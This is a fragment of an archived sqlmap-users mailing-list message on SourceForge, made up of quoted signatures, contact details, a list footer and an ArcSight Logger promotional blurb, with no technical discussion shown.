Zagreb, Croatia > > > > > ------------------------------------------------------------------------------ > > Special Offer-- Download ArcSight Logger for FREE (a $49 USD value)! > > Finally, a world-class log management solution at an even better > price-free! > > Download using promo code Free_Logger_4_Dev2Dev. Offer expires > > February 28th, so secure your free ArcSight Logger TODAY! > > http://p.sf.net/sfu/arcsight-sfd2d > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > -- > Bernardo Damele A. G. > > E-mail / Jabber: bernardo.damele (at) gmail.com > Mobile: +447788962949 (UK 07788962949) > PGP Key ID: 0x05F5A30F > -- David Gomes Guimarães |
×
Want the latest updates on software, tech news, and AI?
Get latest updates about software, tech news, and AI from SourceForge directly in your inbox once a month.
Thanks for helping keep SourceForge clean.
X